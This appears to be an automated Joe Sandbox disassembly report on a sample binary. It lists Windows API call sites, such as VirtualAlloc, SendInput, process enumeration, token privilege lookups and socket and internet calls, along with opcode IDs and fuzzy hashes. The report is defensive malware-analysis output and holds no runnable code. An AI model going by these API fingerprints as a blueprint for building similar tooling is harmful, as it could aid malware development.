                                                              • Instruction Fuzzy Hash: 1CC1B074A04216EFCB14DFA4C894EAEBBB5FF48704B208999E809DB351D734ED81DB94
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?), ref: 004AE0BE
                                                              • CharLowerBuffW.USER32(?,?), ref: 004AE101
                                                                • Part of subcall function 004AD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 004AD7C5
                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 004AE301
                                                              • _memmove.LIBCMT ref: 004AE314
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                              • String ID:
                                                              • API String ID: 3659485706-0
                                                              • Opcode ID: 82225728b38104ff9a49db83fe23b21830db10bc2d2ab117fc3e1b77855114c7
                                                              • Instruction ID: 7bfe68dc16036f5598c4543002d435e84518da6fe6d3a770a91897647d100ceb
                                                              • Opcode Fuzzy Hash: 82225728b38104ff9a49db83fe23b21830db10bc2d2ab117fc3e1b77855114c7
                                                              • Instruction Fuzzy Hash: B1C168716083019FC714DF29C480A6ABBE4FF9A318F14896EF8999B351D735E906CB86
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 004A80C3
                                                              • CoUninitialize.OLE32 ref: 004A80CE
                                                                • Part of subcall function 0048D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0048D5D4
                                                              • VariantInit.OLEAUT32(?), ref: 004A80D9
                                                              • VariantClear.OLEAUT32(?), ref: 004A83AA
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: d9d845acb7bb8352719a493293ea408f1a897c95de110c31809698f406013b6a
                                                              • Instruction ID: af64c381ab31acfe6a70703340d28455f8d13ab560cdff11b59fe90c2b880563
                                                              • Opcode Fuzzy Hash: d9d845acb7bb8352719a493293ea408f1a897c95de110c31809698f406013b6a
                                                              • Instruction Fuzzy Hash: 7EA135756047019FCB04EF15C881A2AB7E4FF9A358F04445EF9999B3A1CB78EC05CB8A
                                                              APIs
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: 078a7bcf3c078cbf3f66e5fd65bbfb7992060a6bc44122d3510f3b43b44665df
                                                              • Instruction ID: e07d27d010c06c55b65112b7424c3798da38cbb11ba45ddd3400a51f7896e079
                                                              • Opcode Fuzzy Hash: 078a7bcf3c078cbf3f66e5fd65bbfb7992060a6bc44122d3510f3b43b44665df
                                                              • Instruction Fuzzy Hash: 1C51F7747003019ACBA8BF66D891A3EB3E5AF45314F21DC1FE586DB291DB78D885870D
                                                              APIs
                                                              • GetWindowRect.USER32(0122EC48,?), ref: 004B9863
                                                              • ScreenToClient.USER32(00000002,00000002), ref: 004B9896
                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 004B9903
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: 31da4bdc92ac023c65ad5f9bc9b43339f75802d1ae0b4997b61e607e802dd459
                                                              • Instruction ID: fb97e32b4fc6a61b2e5be8e88d5a3be1efcfd92e1f0390b3e5d7481e6896d6b0
                                                              • Opcode Fuzzy Hash: 31da4bdc92ac023c65ad5f9bc9b43339f75802d1ae0b4997b61e607e802dd459
                                                              • Instruction Fuzzy Hash: 1B514D74A00608AFCB14DF64D880AEE7BB5FF45360F10826AFA559B3A0D734AD51CBA4
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00489AD2
                                                              • __itow.LIBCMT ref: 00489B03
                                                                • Part of subcall function 00489D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00489DBE
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00489B6C
                                                              • __itow.LIBCMT ref: 00489BC3
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: b0ba78b4311b23f210d2f4f80b22dd7a5157a520417991c1e763581047cd0376
                                                              • Instruction ID: ea05e8f9c470d455b1e09682da42dcaa079daa3867837a899d848bcdd8bfea9d
                                                              • Opcode Fuzzy Hash: b0ba78b4311b23f210d2f4f80b22dd7a5157a520417991c1e763581047cd0376
                                                              • Instruction Fuzzy Hash: 4841D5B0A00608ABDF21EF55C845BFE7BB9EF48724F04042EF905A3291DB78AD44CB59
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 004A69D1
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A69E1
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004A6A45
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A6A51
                                                              Similarity
                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                              • String ID:
                                                              • API String ID: 2214342067-0
                                                              • Opcode ID: b5de05217b6337f7d1f4f3bfe01da78d02f33d63695350284382cdfd3830bb65
                                                              • Instruction ID: dd9f4a190b6f4f9e5aa65011d06a0a31312308adfd242bc16a5d5cc7be01d057
                                                              • Opcode Fuzzy Hash: b5de05217b6337f7d1f4f3bfe01da78d02f33d63695350284382cdfd3830bb65
                                                              • Instruction Fuzzy Hash: 1841C3747002006FEB50BF25DC86F2E77A49B59B18F14C56EFA199B3C2DAB89D008B59
                                                              APIs
                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,004BF910), ref: 004A64A7
                                                              • _strlen.LIBCMT ref: 004A64D9
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID:
                                                              • API String ID: 4218353326-0
                                                              • Opcode ID: 0c72af583b88bb71b1add66067b0cce0f4fe6c05b197565f2b960e2ce0536e8c
                                                              • Instruction ID: 991a0e93809402c3f49d5bf5e64f740e0246e6f9c61296e897c0a34710219b1b
                                                              • Opcode Fuzzy Hash: 0c72af583b88bb71b1add66067b0cce0f4fe6c05b197565f2b960e2ce0536e8c
                                                              • Instruction Fuzzy Hash: E341CA71A00104ABCB14FBA5ECC5FAEB7A9AF19314F15815FF81997292DB38AD04CB58
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0049B89E
                                                              • GetLastError.KERNEL32(?,00000000), ref: 0049B8C4
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0049B8E9
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0049B915
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              • Opcode ID: b5ed0fe867dde7b75be1850398daa512076c130df3f72bce850afe8cc3e7c51e
                                                              • Instruction ID: 221d724c031c03bd9df16268ae837bc093be7c224e7b1a82cd5e5cfc044f642f
                                                              • Opcode Fuzzy Hash: b5ed0fe867dde7b75be1850398daa512076c130df3f72bce850afe8cc3e7c51e
                                                              • Instruction Fuzzy Hash: 4C411B39600610DFCB14EF15C585A5DBBE1EF89314F15809AEC4A9B362CB78FD05CB99
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004B88DE
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 8e3464546924ee10d4de309376f6756893be46e60e26d199cb7dd37cf6f57085
                                                              • Instruction ID: 3c4731f0cc8bbb40f4d3b531e89c5f3fdb129d65c86a0b66bbc03424fff69f5d
                                                              • Opcode Fuzzy Hash: 8e3464546924ee10d4de309376f6756893be46e60e26d199cb7dd37cf6f57085
                                                              • Instruction Fuzzy Hash: 0C31E574600108BFEF24AE28CC45BFA7BA8EB05350F54411BFA15D62A1CA78E950DB6F
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 004BAB60
                                                              • GetWindowRect.USER32(?,?), ref: 004BABD6
                                                              • PtInRect.USER32(?,?,004BC014), ref: 004BABE6
                                                              • MessageBeep.USER32(00000000), ref: 004BAC57
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 3158ee15c186e550a57d7e198dc34b00eadb648a4243249d93e62778fe4975f0
                                                              • Instruction ID: a2a9e88d65a5cf8f2c3dcb1218ff35892b1abe717ff715c2ffb395a5c54b948d
                                                              • Opcode Fuzzy Hash: 3158ee15c186e550a57d7e198dc34b00eadb648a4243249d93e62778fe4975f0
                                                              • Instruction Fuzzy Hash: 9F418E30600619DFCF11DF58D884AAA7BF5FB49344F1881BAE914DB361D734E861CBAA
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00490B27
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00490B43
                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00490BA9
                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00490BFB
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: 2da292853287392b82afeb22cb6a615ed62cb2cbff78bbe1a1d699f79916b4ad
                                                              • Instruction ID: 29ce5f3adfb0ef6573d03536dc45297ad45a31b2bca6de983ad32eb2a16f65d2
                                                              • Opcode Fuzzy Hash: 2da292853287392b82afeb22cb6a615ed62cb2cbff78bbe1a1d699f79916b4ad
                                                              • Instruction Fuzzy Hash: 85312630D40218AEEF348AA98C05BFEBFA9AB45318F04437BE594522D1C37CA985975A
                                                              APIs
                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00490C66
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00490C82
                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00490CE1
                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00490D33
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: fa9a944b897baf3728395cfeb06b3d10558360f81a4a84eb5dcb082b4717c931
                                                              • Instruction ID: ef330e49430cd798cab964a9a694be86a0b0ffe0a80aff15c68f8e1af64f1605
                                                              • Opcode Fuzzy Hash: fa9a944b897baf3728395cfeb06b3d10558360f81a4a84eb5dcb082b4717c931
                                                              • Instruction Fuzzy Hash: F6310530940218AEFF388A658C087FFBFA6AB45314F04473BE485522D1C33D9D49979A
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004661FB
                                                              • __isleadbyte_l.LIBCMT ref: 00466229
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00466257
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0046628D
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 6971e780dd21f018cc849ab235de7e8f62da7bfe9b12c0f2d28748be19d9c0f8
                                                              • Instruction ID: fd082ba18617af2429c82f5f7e67c1110c0ab91f2fcc6f70e9821f1ca68b6feb
                                                              • Opcode Fuzzy Hash: 6971e780dd21f018cc849ab235de7e8f62da7bfe9b12c0f2d28748be19d9c0f8
                                                              • Instruction Fuzzy Hash: 1231F230600246AFDF219F65CC44BAB7FA9FF42310F16416AE82497291FB34E950CB96
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 004B4F02
                                                                • Part of subcall function 00493641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0049365B
                                                                • Part of subcall function 00493641: GetCurrentThreadId.KERNEL32 ref: 00493662
                                                                • Part of subcall function 00493641: AttachThreadInput.USER32(00000000,?,00495005), ref: 00493669
                                                              • GetCaretPos.USER32(?), ref: 004B4F13
                                                              • ClientToScreen.USER32(00000000,?), ref: 004B4F4E
                                                              • GetForegroundWindow.USER32 ref: 004B4F54
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: af133547668b53a49938c43808d20135dcce965d06ff6ace9cfbe79f35fc32df
                                                              • Instruction ID: b6627148cd030bbe35f4939c6b5f23225a86e137d84697d49c2c2db7a36dfb13
                                                              • Opcode Fuzzy Hash: af133547668b53a49938c43808d20135dcce965d06ff6ace9cfbe79f35fc32df
                                                              • Instruction Fuzzy Hash: 69312D71D00108AFCB14EFBAC8859EFF7F9EF99304F10446AE415E7201DA75AE058BA4
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00493C7A
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00493C88
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00493CA8
                                                              • CloseHandle.KERNEL32(00000000), ref: 00493D52
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 420147892-0
                                                              • Opcode ID: 9cfc1f1386abc203da53634bdc5ea8907c9710f25ba758fa700921ccbf1c56e4
                                                              • Instruction ID: f335d3ff080c91af2b568f3d5377112cea61bd4ea3decdc4368de04a79fdabdb
                                                              • Opcode Fuzzy Hash: 9cfc1f1386abc203da53634bdc5ea8907c9710f25ba758fa700921ccbf1c56e4
                                                              • Instruction Fuzzy Hash: DC31F471108304DFD710EF55C891AAFBBE8EF89318F40093EF485822A1EB749E49CB56
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • GetCursorPos.USER32(?), ref: 004BC4D2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0046B9AB,?,?,?,?,?), ref: 004BC4E7
                                                              • GetCursorPos.USER32(?), ref: 004BC534
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0046B9AB,?,?,?), ref: 004BC56E
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: 5bf64ab07096634b44ba6adc9acb717850839a7747ed7e6b325c4f3e59331e37
                                                              • Instruction ID: bacc3030bf76d08f61a04910ad348a1d3e55127de64586fd5cbc4ec974674914
                                                              • Opcode Fuzzy Hash: 5bf64ab07096634b44ba6adc9acb717850839a7747ed7e6b325c4f3e59331e37
                                                              • Instruction Fuzzy Hash: B5318135510428FFCB259F58C8D8EFB7BB5EB09310F44416AF9098B361C735A960DBA8
                                                              APIs
                                                                • Part of subcall function 0048810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00488121
                                                                • Part of subcall function 0048810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0048812B
                                                                • Part of subcall function 0048810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0048813A
                                                                • Part of subcall function 0048810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00488141
                                                                • Part of subcall function 0048810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00488157
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004886A3
                                                              • _memcmp.LIBCMT ref: 004886C6
                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004886FC
                                                              • HeapFree.KERNEL32(00000000), ref: 00488703
                                                              Similarity
                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                              • String ID:
                                                              • API String ID: 1592001646-0
                                                              • Opcode ID: 01cc38c879496336a1003486fd99a942cc57ea7bdb10a28244448c834f403ccb
                                                              • Instruction ID: b44742dbf9dca8e60e990751f040fcbca84940cb96d594b5295ba7bb79a6d869
                                                              • Opcode Fuzzy Hash: 01cc38c879496336a1003486fd99a942cc57ea7bdb10a28244448c834f403ccb
                                                              • Instruction Fuzzy Hash: B0217C71E40108EFDB10EFA8CA49BEEB7B8EF45305F55445EE844A7241EB35AE05CB58
                                                              APIs
                                                              • __setmode.LIBCMT ref: 004509AE
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00497896,?,?,00000000), ref: 00435A2C
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00497896,?,?,00000000,?,?), ref: 00435A50
                                                              • _fprintf.LIBCMT ref: 004509E5
                                                              • OutputDebugStringW.KERNEL32(?), ref: 00485DBB
                                                                • Part of subcall function 00454AAA: _flsall.LIBCMT ref: 00454AC3
                                                              • __setmode.LIBCMT ref: 00450A1A
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                              • String ID:
                                                              • API String ID: 521402451-0
                                                              • Opcode ID: 4f3b364da7a036f1364cb101cee8c711343dd61765e58c6661a92b3e6a9d8f24
                                                              • Instruction ID: 562e98a9a5bba183c54968324944e72ff5d1b2d75fade75d606a2ea874634575
                                                              • Opcode Fuzzy Hash: 4f3b364da7a036f1364cb101cee8c711343dd61765e58c6661a92b3e6a9d8f24
                                                              • Instruction Fuzzy Hash: 2B116D355041047FDB04B3BA9C469BE77A89F8531DF10015FF90457183EE2C4D9A979D
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004A17A3
                                                                • Part of subcall function 004A182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004A184C
                                                                • Part of subcall function 004A182D: InternetCloseHandle.WININET(00000000), ref: 004A18E9
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: ff5704977cd6b8a98888ded24334e7bfcbf4ec2010ac4127ae4fcc3e8ae82f32
                                                              • Instruction ID: decc90da9851b16754c2cb2c9a1a134a68df5f673a37bd41cddd589d7fcd1d44
                                                              • Opcode Fuzzy Hash: ff5704977cd6b8a98888ded24334e7bfcbf4ec2010ac4127ae4fcc3e8ae82f32
                                                              • Instruction Fuzzy Hash: F221F635200601BFEB129F64CC40FBBBBA9FF5A710F10412FF91596660DB79D811A7A8
                                                              APIs
                                                              • GetFileAttributesW.KERNEL32(?,004BFAC0), ref: 00493A64
                                                              • GetLastError.KERNEL32 ref: 00493A73
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00493A82
                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,004BFAC0), ref: 00493ADF
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                              • String ID:
                                                              • API String ID: 2267087916-0
                                                              • Opcode ID: 18b4b4d0b656188786adcd842b53e764ba9b276a0815c1c1359f3b083923a971
                                                              • Instruction ID: d039559c0c3c6e171d4b91e80f0c9dc42bc9f3a94182d567af0919a391b3a76f
                                                              • Opcode Fuzzy Hash: 18b4b4d0b656188786adcd842b53e764ba9b276a0815c1c1359f3b083923a971
                                                              • Instruction Fuzzy Hash: A62194745082019F8B10DF28C88586B7BE4EE5A369F104A3FF4D9C72A1D7359E4ACB5A
                                                              APIs
                                                              • _free.LIBCMT ref: 00465101
                                                                • Part of subcall function 0045571C: __FF_MSGBANNER.LIBCMT ref: 00455733
                                                                • Part of subcall function 0045571C: __NMSG_WRITE.LIBCMT ref: 0045573A
                                                                • Part of subcall function 0045571C: RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,00450DD3,?), ref: 0045575F
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: f0c7514cf34b75d1dec3a5d65e69f8f71cac0de08a46e7e90ff919b5fdd99f2e
                                                              • Instruction ID: b2949bf79be9261998477489246c6bb8b46537fd038dcc6eb08de171396e66c4
                                                              • Opcode Fuzzy Hash: f0c7514cf34b75d1dec3a5d65e69f8f71cac0de08a46e7e90ff919b5fdd99f2e
                                                              • Instruction Fuzzy Hash: F711E7B1D00A11AFCB312F75EC057AE37985B063A6F10453FFD09A6252EE3C8D45869E
                                                              APIs
                                                              • _memset.LIBCMT ref: 004344CF
                                                                • Part of subcall function 0043407C: _memset.LIBCMT ref: 004340FC
                                                                • Part of subcall function 0043407C: _wcscpy.LIBCMT ref: 00434150
                                                                • Part of subcall function 0043407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00434160
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00434524
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00434533
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0046D4B9
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: 0a64aea06e6ce9b391dbfeff2eabfc0a35df323df7c6c666c7276223eb3d24d3
                                                              • Instruction ID: 001abae7789dfa77c0979a5510598bd2e1201795355f12436f38be45fb6ef840
                                                              • Opcode Fuzzy Hash: 0a64aea06e6ce9b391dbfeff2eabfc0a35df323df7c6c666c7276223eb3d24d3
                                                              • Instruction Fuzzy Hash: 8321D370D04794AFE7328B248845BE7BBEC9B05309F04009FE78E56242D7782E88CB4A
                                                              APIs
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00497896,?,?,00000000), ref: 00435A2C
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00497896,?,?,00000000,?,?), ref: 00435A50
                                                              • gethostbyname.WSOCK32(?,?,?), ref: 004A6399
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A63A4
                                                              • _memmove.LIBCMT ref: 004A63D1
                                                              • inet_ntoa.WSOCK32(?), ref: 004A63DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                              • String ID:
                                                              • API String ID: 1504782959-0
                                                              • Opcode ID: 0d297e1ce715eabc32487149c9465d4b4f6a40478239e23191458876f64fcc4d
                                                              • Instruction ID: f5b88c3366b729028e0b465fb793f6a7097c4bb9c344c37ab3b307d69f8d570d
                                                              • Instruction Fuzzy Hash: 2E119371500109AFCB00FBA5DD86DEE77B8AF19314B14412AF505A7262DB349F14DB69
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00488B61
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00488B73
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00488B89
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00488BA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 019437fbba57819f97421e338b692ff087a25cdec58e2a3cc2d481b8e9f6e516
                                                              • Instruction ID: be6c6b708449e1320dab14155f15f78223038653fec082c67d76d981a27b2da4
                                                              • Instruction Fuzzy Hash: 90113A79901218BFDB11DBA5CC84E9EBB74EB48310F6040A6E900B7290DA716E11DB94
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 004312D8
                                                              • GetClientRect.USER32(?,?), ref: 0046B5FB
                                                              • GetCursorPos.USER32(?), ref: 0046B605
                                                              • ScreenToClient.USER32(?,?), ref: 0046B610
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: 5880c8494b0f533c72820ebad36af210bac67bdaaa240055db53594a632fc853
                                                              • Instruction ID: 9cfac9065d0f922733ef4150bb410e5354b3a3bcc2d54429c7b9744bfc93a2e4
                                                              • Instruction Fuzzy Hash: 59112B35500059FBCB10EF99D8859FF77B8FB09300F4005A6FA11E7251C734BA568BA9
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0048D84D
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0048D864
                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0048D879
                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0048D897
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                              • String ID:
                                                              • API String ID: 1352324309-0
                                                              • Opcode ID: 912b193220bb14a7961c931ddd6e6d6db261d255a3850abe1ca04051a7883f56
                                                              • Instruction ID: 1b9caa12b41934868637f1137be22a53875872c5a3e9a601de2d21c0d19f96ce
                                                              • Instruction Fuzzy Hash: 60115275A06304DBE320AF51DC08F9BBBBCEF00700F10497AA525D6190D7B4E549ABA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
